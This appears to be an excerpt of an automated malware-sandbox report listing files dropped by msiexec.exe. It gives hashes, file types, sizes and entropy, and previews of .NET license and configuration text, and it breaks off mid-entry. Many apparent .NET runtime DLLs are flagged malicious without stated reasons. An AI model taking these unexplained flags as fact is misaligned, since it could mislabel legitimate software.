                                                                                                                                                                                                                                        SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                        MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                        SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                        SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                        SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602672
                                                                                                                                                                                                                                        Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                        MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                        SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                        SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                        SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                        MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                        SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                        SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                        SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (514), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9519
                                                                                                                                                                                                                                        Entropy (8bit):4.902271147017698
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ydP0KvBLCqikR/EgGJLrlwD+eilNi5Py1SDeoDXDw9lF5OMz6Q:PWBuqikR/EDJLriwlNi5KI1Tw9lF5OjQ
                                                                                                                                                                                                                                        MD5:31C5A77B3C57C8C2E82B9541B00BCD5A
                                                                                                                                                                                                                                        SHA1:153D4BC14E3A2C1485006F1752E797CA8684D06D
                                                                                                                                                                                                                                        SHA-256:7F6839A61CE892B79C6549E2DC5A81FDBD240A0B260F8881216B45B7FDA8B45D
                                                                                                                                                                                                                                        SHA-512:AD33E3C0C3B060AD44C5B1B712C991B2D7042F6A60DC691C014D977C922A7E3A783BA9BADE1A34DE853C271FDE1FB75BC2C47869ACD863A40BE3A6C6D754C0A6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MICROSOFT SOFTWARE LICENSE TERMS..MICROSOFT .NET LIBRARY ..These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. Please read them. They apply to the software named above, which includes the media on which you received it, if any. The terms also apply to any Microsoft.. * updates,.. * supplements,.. * Internet-based services, and.. * support services..for this software, unless other terms accompany those items. If so, those terms apply...BY USING THE SOFTWARE, YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM, DO NOT USE THE SOFTWARE...IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE PERPETUAL RIGHTS BELOW...1. INSTALLATION AND USE RIGHTS. .. a. Installation and Use. You may install and use any number of copies of the software to design, develop and test your programs... b. Third Party Programs. The software may include third party programs that Microsoft, not the third party, licenses to you under this
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (755), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79954
                                                                                                                                                                                                                                        Entropy (8bit):5.2343129347468
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:HA9jHwQZGfgg39/zwgAVkguQXrDjugtSEGepkWvrpX7anuqdLS4mfiStPq+3Lefj:HA97wfogz1AVxuujHtSFULryLggrGRwJ
                                                                                                                                                                                                                                        MD5:F77A4AECFAF4640D801EB6DCDFDDC478
                                                                                                                                                                                                                                        SHA1:7424710F255F6205EF559E4D7E281A3B701183BB
                                                                                                                                                                                                                                        SHA-256:D5DB0ED54363E40717AE09E746DEC99AD5B09223CC1273BB870703176DD226B7
                                                                                                                                                                                                                                        SHA-512:1B729DFA561899980BA8B15128EA39BC1E609FE07B30B283001FD9CF9DA62885D78C18082D0085EDD81F09203F878549B48F7F888A8486A2A526B134C849FD6B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.NET Runtime uses third-party libraries or other resources that may be..distributed under licenses different than the .NET Runtime software.....In the event that we accidentally failed to list a required notice, please..bring it to our attention. Post an issue or email us:.... dotnet@microsoft.com....The attached notices are provided for information only.....License notice for ASP.NET..-------------------------------....Copyright (c) .NET Foundation. All rights reserved...Licensed under the Apache License, Version 2.0.....Available at..https://github.com/dotnet/aspnetcore/blob/main/LICENSE.txt....License notice for Slicing-by-8..-------------------------------....http://sourceforge.net/projects/slicing-by-8/....Copyright (c) 2004-2006 Intel Corporation - All Rights Reserved......This software program is licensed subject to the BSD License, available at..http://www.opensource.org/licenses/bsd-license.html.....License notice for Unicode data..-------------------------------...
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):139440
                                                                                                                                                                                                                                        Entropy (8bit):6.285914420289258
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:WwmRQoZmiyYIRPEgufW6see//RLlpseL5AXbwFWY+d:WwmRbZmiyAfClnRLlpfLyLyWYW
                                                                                                                                                                                                                                        MD5:CE8CBB6E38AD12C689FB7163909E26D6
                                                                                                                                                                                                                                        SHA1:E768FF143E96D957715EB6A63DA8BCE6A3AFF650
                                                                                                                                                                                                                                        SHA-256:980F40799FEBBD508652C7FE657A55B0E7BFE822E812C3070681896DA941BB69
                                                                                                                                                                                                                                        SHA-512:D6E49FE67A5239ECF39C6C871975E7DB15BD9BECECF208CD0E60DCFFA52B4BCF3C0A68894A56907FFD8626781AC898247633499B5F40D0A04AD16BFE2890658E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):378144
                                                                                                                                                                                                                                        Entropy (8bit):6.30005759256042
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:+CrkuaHqY/1EtiaDC3+Gr4iAOs+WEAO2gcmgrW09S:JmHqe1E3D/iAOsksH9
                                                                                                                                                                                                                                        MD5:9D67514FE36639B7EDA307FB46D27178
                                                                                                                                                                                                                                        SHA1:B8BA4CA6BCF2E5740B7E0F7A077FC72B1248BAFE
                                                                                                                                                                                                                                        SHA-256:EC8F92F2BCC5F6EE94605B7883E663236F2A2F578F4E610EAE9934CBD4266FE9
                                                                                                                                                                                                                                        SHA-512:4CA3BB0167F7F2512BFB1CC69B72FBDEFC4D3ED7679BA7ABD4B8C60F42DF2B95F6B44550F5A14C5843305B7705634D9B26327D87BB24F2934ABB5FF94C54AEA8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50
                                                                                                                                                                                                                                        Entropy (8bit):4.101984511178706
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:3SVNHUdSBnO2RUiXXdJ:LdSBO0z
                                                                                                                                                                                                                                        MD5:51BD796C4F311A08FFB7781E5D032A93
                                                                                                                                                                                                                                        SHA1:F91A587530005F6A7EDC281B2C86FC3B0369F676
                                                                                                                                                                                                                                        SHA-256:D684BCA93AB166D9929058855272376468E4D58425040467C5BF329725468116
                                                                                                                                                                                                                                        SHA-512:421A623385F5DEC6526A6765C13C3F6F4DD177F1C11A8894618BB3EDE1D87165442749350BCFF9BF0781C8DF81C2DCBBD331A20532EA229197D14FCC82199A83
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:e77011b31a3e5c47d931248a64b47f9b2d47853d..6.0.32..
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1042592
                                                                                                                                                                                                                                        Entropy (8bit):6.758579311481363
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:u4NoNIdwu/Mw+u1xjx1Rb+Vu9yHTzsYVhdi4YBa72DS:uHNIdwuBLlPb+Vu9yHJXiZO
                                                                                                                                                                                                                                        MD5:58494487C1CD786C3AA26773E28B59EA
                                                                                                                                                                                                                                        SHA1:2B9E1F70AFC82DDAF1ADC1A7040FE960FAEB4D6B
                                                                                                                                                                                                                                        SHA-256:800E688FF423393F2741BE90BC6177B37F7077C11A885A3AE3C5AECEF941D521
                                                                                                                                                                                                                                        SHA-512:F4FD17EAD8F5039993B8EE9222CF61CAC841528578BDF5326B2AEB2FAAEF0CC6798DB301DC84035FFAE2BDAEADC93F7B63EAFE98727E09F25374455E2B6838DB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2309152
                                                                                                                                                                                                                                        Entropy (8bit):6.414576855139372
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:jH+fGgFyzuNiG6H0n8D1gkrz/OAyFAopdrq/c/:+GgFQq8DT/ZyFDN0c
                                                                                                                                                                                                                                        MD5:A71CD05C01F0FC603C0BD782516F806D
                                                                                                                                                                                                                                        SHA1:C15E261D5E7318875D324D28AB70A883CD434C81
                                                                                                                                                                                                                                        SHA-256:7F8DCF37D9D66EAE14C48A79FA2FCD447BD0F38A21BE0203A9C4A89398AACF28
                                                                                                                                                                                                                                        SHA-512:CE53F6DC1F02889ED6FB1F8DF226F9BADBB039F79505CDBD599A00A32B6617DA5E19F2AD7F76BB8134B3CCAD39FAB2209ED8EC6AE42CD30402C4E450FC19FA88
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32962
                                                                                                                                                                                                                                        Entropy (8bit):4.3074461179606
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:+49mVEsIhKPMEPrT3XCGjDyiEc6BHa21Fe8kFN92uwtEeCJyX:voVEsIhKPMEPrT3XCGjDyiEc6BHa21F1
                                                                                                                                                                                                                                        MD5:8E0F8427C729E6B4CF95998F846A0887
                                                                                                                                                                                                                                        SHA1:201AD7BE0AD49C2C2DBE7C27B86A9295DCF0ACB0
                                                                                                                                                                                                                                        SHA-256:335A13F00FB336771FBEA2BB4A29E99E6E8BCF17B8C484091D256A99AB5DFDAF
                                                                                                                                                                                                                                        SHA-512:368D3F644361014808932F21C6324153D2A250B6FF869A8F261F68CCF2C93874F72CDE8B474B3A7E4E54A7B10649B50F83E3AE5910D325E8CF7A77BA06DD9EE5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v6.0/win-x64",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v6.0": {},.. ".NETCoreApp,Version=v6.0/win-x64": {.. "Microsoft.NETCore.App.Runtime.win-x64/6.0.32": {.. "runtime": {.. "System.Private.CoreLib.dll": {.. "assemblyVersion": "6.0.0.0",.. "fileVersion": "6.0.3224.31407".. },.. "Microsoft.VisualBasic.dll": {.. "assemblyVersion": "10.0.0.0",.. "fileVersion": "6.0.3224.31407".. },.. "mscorlib.dll": {.. "assemblyVersion": "4.0.0.0",.. "fileVersion": "6.0.3224.31407".. },.. "netstandard.dll": {.. "assemblyVersion": "2.1.0.0",.. "fileVersion": "6.0.3224.31407".. },.. "System.AppContext.dll": {.. "assemblyVersion": "6.0.0.0",.. "fileVersion": "6.0.3224.31407".. },..
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159
                                                                                                                                                                                                                                        Entropy (8bit):4.54941695087313
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:3Hpn/hdNxDI/pANC+KL4nNOcW3mJAGRM3Bojqy2VKXmHEk/FTy:3Hp/hdNyhAk+Q6NOCUo+K8EkNTy
                                                                                                                                                                                                                                        MD5:3FBD84A952D4BAB02E11FEC7B2BBC90E
                                                                                                                                                                                                                                        SHA1:E92DE794F3C8D5A5A1A0B75318BE9D5FB528D07D
                                                                                                                                                                                                                                        SHA-256:1B7AA545D9D3216979A9EFE8D72967F6E559A9C6A22288D14444D6C5C4C15738
                                                                                                                                                                                                                                        SHA-512:C97C1DA7AE94847D4EDF11625DC5B5085838C3842A550310CCA5C70BA54BE907FF454CA1E0080BA451EACFC5954C3F778F8B4E26C0933E55C121C86C9A24400B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{.. "runtimeOptions": {.. "tfm": "net6.0",.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false.. }.. }..}
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1245360
                                                                                                                                                                                                                                        Entropy (8bit):6.768935404732361
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:tmvclJOXFDjW/lWSGcIyEAGY/7YlDwCi/Io+dw:QvcHOXFPW/lRGcDEAGYhCiN
                                                                                                                                                                                                                                        MD5:D9062214FEE5FE8D1903D3FCF1E1FBEB
                                                                                                                                                                                                                                        SHA1:34C9078D2F4F70646313975022A117192214FC4A
                                                                                                                                                                                                                                        SHA-256:F0D2D4D1E1B38D1449E51F5BFDC73B25C24F8659D98871BDDAF0650B88982538
                                                                                                                                                                                                                                        SHA-512:2B4A0D678B3AAD2E5665C71B9576522B0997E3B802BF260B785EDAF5B0DB390639A34EAF1F5D02B520272E1247968F9B4819198719418180ED4DBFC935C8E914
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18184
                                                                                                                                                                                                                                        Entropy (8bit):6.586065972352763
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:59SphH3czeYtcxWmH6t9QdWaYA6VFHRN7WDpSR9zWiBcfCg:5kHMzbJ+FClipe9z5cT
                                                                                                                                                                                                                                        MD5:F5A860792D6CE3C90865FBFBBC811026
                                                                                                                                                                                                                                        SHA1:CD7E52880FCC072C2CB743D040E7AE67C7B79D1B
                                                                                                                                                                                                                                        SHA-256:833AFA20C11993D9260EF08CA493462CC182B940ABBB7FAE0BAE359EC114CCF1
                                                                                                                                                                                                                                        SHA-512:A6FD6CCA6FDCDD18604DB8C21ED9BE7263CB779298F5BE51A05FDC1BEB453FBF3C7B7E759031CEE54F476439975F2733FED3B539F70E8D02777EAF3091220961
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):26272
                                                                                                                                                                                                                                        Entropy (8bit):6.550629473321971
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:GWhPKpWCZWnjmMDQnqyXhcuolXWcYA6VFHRN7yfUiHR9z70+I:40jm5n5XivDFClTQ9zG
                                                                                                                                                                                                                                        MD5:EC5D0ACACD99FFD68DB813B11F04965C
                                                                                                                                                                                                                                        SHA1:AEEA184FA29CD03087E92D25B47EECA5DA0EC09D
                                                                                                                                                                                                                                        SHA-256:85EB1682060ABD5B680267B1F4A8FD3F9141919781A7A4F259F50AC99C1CFD5E
                                                                                                                                                                                                                                        SHA-512:C19C3B504F16015C4DFCBF4F3EF0CE2652C661823765B7FC9D709FD844831C1C03AEB3FAB9B12F850920CFA632C9C969EC6F466A13CA9AD96C69CC26D5FD2E80
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):87712
                                                                                                                                                                                                                                        Entropy (8bit):6.6073982140765795
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:xyjecxml5gdJKCILek2ymrsykEomWxGsViqo5qkbqkikzhma:xyjeIml5KJKCdy5ykE8xGsViqCqszjD
                                                                                                                                                                                                                                        MD5:E1E1078BD5CE3EB3865684D082839E72
                                                                                                                                                                                                                                        SHA1:DF92E8E112F30DB28B49018023E7E6433170E755
                                                                                                                                                                                                                                        SHA-256:6EB1A0E98D684C6F647092299C680186A2F80C571C137043B1AF9B0FF0518C81
                                                                                                                                                                                                                                        SHA-512:ECA6E8A8E589FF01A97D8A62F884BBC7BB9A39F074502DD3EF8B6AF0D9D81FB8F97C5DCADAF638386BBAD1E57083A4DAB475BFE80FC25488CC701D8E31596ED4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15632
                                                                                                                                                                                                                                        Entropy (8bit):6.786322181535639
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:/GyxxBHaW+E7WJpWjA6Kr4PFHnhWgN7agWe5Y00pyEuX01k9z3AD4IQvpIS7WcU:/zrHaW+E7WJYA6VFHRN7pEpcR9zt5zU
                                                                                                                                                                                                                                        MD5:F65763C85CFE0BE955E9BB620DE349C9
                                                                                                                                                                                                                                        SHA1:9B7A9FC65982CC76E859B5605C9DE2C384AD8528
                                                                                                                                                                                                                                        SHA-256:7C804005A4E369C54E2FEFB338C3C1BC2D0AAFA6AA6D0FEE51F9AB161B8C8034
                                                                                                                                                                                                                                        SHA-512:8173154BDA7F16957182495692E19E1B71F26D9B7E1E9CB753A7B1D05A7BFCC2F9B51B83E53343EEE02A5C312307576B5218937E238F99B6D1209F86B5CFD995
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15520
                                                                                                                                                                                                                                        Entropy (8bit):6.770683864726388
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:hb+0jWYb2WapWjA6Kr4PFHnhWgN7aIWPALBm+0U8X01k9z3AlL0w:hFjWYb2WaYA6VFHRN7uCBmo8R9zML0w
                                                                                                                                                                                                                                        MD5:63A871EC790F87FD651C5C31191669D3
                                                                                                                                                                                                                                        SHA1:B1DCA1FAF1A6C68840252F50263A3F83FCF1B089
                                                                                                                                                                                                                                        SHA-256:4505FB902833DA7A84AEE6940ECF1214FE4D58A5538C6E1B9D24B9A5F4BA542D
                                                                                                                                                                                                                                        SHA-512:FC3953902E06E563644D075E535F5F7ADB274513C608412C123520A60FA3DFE5FCC5E54D1580F7E4C35CFE3C7000414B6AE5A3985B097D85A3AFFDFADDFD6836
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):246944
                                                                                                                                                                                                                                        Entropy (8bit):6.848188639113924
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:IsS/sAVyNURkbEf5+i6MKORygikbyO2aGJ0pebyz:IslArRvt6MikbD2lieyz
                                                                                                                                                                                                                                        MD5:EE80410AB6F7E4CCF5AF69610B88C961
                                                                                                                                                                                                                                        SHA1:6136CF0F7AF46A00867631E83C912F1CAA9924D0
                                                                                                                                                                                                                                        SHA-256:1ADAEC2435191BBDCB569BF6847D8DADBBD8311E8D4A197A8E589422184673FD
                                                                                                                                                                                                                                        SHA-512:62038BB7A1482B61E8465E6586CE041D8FB43600CC97A4FE9360B5A7D9808493F7E4D846B7FD83E9ADBFA00E83442208BF4955CB8E5AFB55B8C892021EBE88E9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):666272
                                                                                                                                                                                                                                        Entropy (8bit):6.7865309669778995
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Q36VIpN0cAxbgmaoB7yPXz66M4cR+c2/oMytOobmJS:Q3OZzaBruLqo
                                                                                                                                                                                                                                        MD5:2213144DBE8516B61EC845255E800E41
                                                                                                                                                                                                                                        SHA1:1B9BC3BA892B6F00AF3A83E3D7539C8118BDB551
                                                                                                                                                                                                                                        SHA-256:3A902B104DE903DDCB9C1FEC58A9D95769F31564D967008AD7232D08C5CD48E6
                                                                                                                                                                                                                                        SHA-512:916EB3A7B4306E2A47F9371DCD6BBB842435C5BDD99E967CE99736F316D445EC5212AD99BC36F1DBF705835077FBB54D415226118B4AADDFC98D6833ACA2A490
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):101144
                                                                                                                                                                                                                                        Entropy (8bit):6.4771157203569025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:vQqNPxgJRRQWsBTkyo+XBQCXeCLDrkEIE:4gxgJRbZEd
                                                                                                                                                                                                                                        MD5:C12C92B54FB343C99F8D01768A366D6E
                                                                                                                                                                                                                                        SHA1:51356DD0B443F14D894F9594F99F115B005104B1
                                                                                                                                                                                                                                        SHA-256:454712AD098DBB00653234FB5E7FB5E6EA7820813D34F0833BDB0D0CC7186CB5
                                                                                                                                                                                                                                        SHA-512:04D4E99B80083A9D6211945210AFE039917D182FDAD0BA035D8DFB076A048ABA3CEC5244E68C06C0068FA592468087EACFA164938232B015E4AE785DDFFAAF04
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95512
                                                                                                                                                                                                                                        Entropy (8bit):6.5344887890851435
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:da5jcaL7hPvoiTCxaDVvkDTC5O7/LyY20SRhpVeypaWszC:dmQC7ZNBsDTs+zyY20SRhpVeygn+
                                                                                                                                                                                                                                        MD5:47D9EE750FD6A7828D0A6CA892BC9E46
                                                                                                                                                                                                                                        SHA1:B0C23A5894F29A6725209E0EE38AAC135C506F8A
                                                                                                                                                                                                                                        SHA-256:53A99E65EC985625A9CC307F1307D2B8B353388A60E311DF1E7467D7DD22E6BB
                                                                                                                                                                                                                                        SHA-512:36C793702FED17B293A8204D555B1675E5297BA5DB84A3576324E4CCB601F1ED0A6B7BF997E51C9B77C5DCFC39D4639F5F3A30BC7D825CD7304A741CC816AA8E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):264992
                                                                                                                                                                                                                                        Entropy (8bit):6.7616104773576104
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:f0bzf+JuwsctkH2KrzQ5t056pAje2l3ki7CL/df:f3JuwDiHQNW/7CLlf
                                                                                                                                                                                                                                        MD5:1EA34151310783585A8326FEF2FA355C
                                                                                                                                                                                                                                        SHA1:19F78734D779A14DA4B09443395A57BAB652353C
                                                                                                                                                                                                                                        SHA-256:61EF7CE0CB1459E2D58AF1795DD0BAFE8C925DEF4620D7EF756BA8EA9C51C0B6
                                                                                                                                                                                                                                        SHA-512:8C42C677026FBE809FB70DE051FF84B31653B07C5D0610358721E529F13563173729793E77F96EF0D966221E1BCE1A863EEBA7E65463A0B9734D5E5C798F95B0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):187040
